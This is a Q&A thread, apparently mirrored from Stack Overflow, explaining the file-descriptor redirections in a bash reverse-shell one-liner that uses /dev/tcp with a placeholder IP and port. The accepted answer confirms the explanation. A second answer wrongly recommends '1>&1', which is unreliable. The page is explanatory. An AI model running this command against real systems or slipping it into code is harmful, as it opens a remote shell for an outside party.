Testing Bash Reverse Shell
Question
I am testing a reverse shell using the tutorial found here .
I have some question about the meaning of the commands used. The command to run on the server is the following:
/bin/bash > /dev/tcp/<IP>/<port> 0<&1 2>&1
I want to double check its meaning. Based on my understanding:
- Start a bash shell
- Redirect output of the shell to TCP connection
<IP>:<port> -
0<&1: Redirect Input from connection&1to stdin0 -
2>&1: Redirect output from stderr2to connection&1
Is the above correct ?
2 answers
solution1
1 ACCPTED 2015-12-01 05:45:33
Yes, it's correct; the goal is for all three FDs -- stdin, stdout, and stderr -- to be pointing to your TCP connection.
Note that this command needs to be run in a bash compiled with /dev/tcp , which is an optional feature provided by the shell itself, not the operating system; moreover, this means that something like system() , which uses /bin/sh , typically won't work to invoke it.
solution2
0 2015-12-01 05:47:25
For STDOUT, use 1>&1 , because 2 will redirect STDERR stream.
So your command should be - /bin/bash > /dev/tcp/<IP>/<port> 0<&1 1>&1
The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.